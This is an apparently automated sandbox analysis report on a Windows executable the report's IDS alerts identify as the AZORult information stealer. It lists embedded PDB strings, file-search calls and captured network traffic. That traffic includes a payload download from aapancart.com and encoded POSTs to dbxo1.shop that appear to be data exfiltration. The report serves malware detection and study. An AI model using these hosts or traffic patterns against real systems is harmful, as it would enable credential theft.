Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7967762388.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7977493803.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7978161221.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7962442056.0000000000178000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016652920.000000001E680000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970034391.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971102874.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971021047.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7985166767.000000001DD1C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7986103075.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020892239.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020696835.000000001DA80000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7990657320.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004065C5 FindFirstFileW,FindClose, 1_2_004065C5
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405990
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00402862 FindFirstFileW, 1_2_00402862

Networking

barindex
Source: Traffic Snort IDS: 2029468 ET TROJAN Win32/AZORult V3.3 Client Checkin M15 192.168.11.20:49836 -> 172.67.203.65:80
Source: Traffic Snort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 172.67.203.65:80 -> 192.168.11.20:49836
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aapancart.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 113Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 17 8b 30 6d 8b 30 60 8b 30 6c 8b 30 65 8b 30 63 8b 30 60 8b 30 61 8b 31 11 8b 30 66 8b 30 67 ec 45 14 8b 30 65 8b 30 6c 8b 30 60 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0m0`0l0e0c0`0a10f0gE0e0l0`
Source: global traffic HTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 32686Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: HTTPS://LOGIN.LIVE.COM/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr, nssdbm3.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7911321206.0000000001875000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
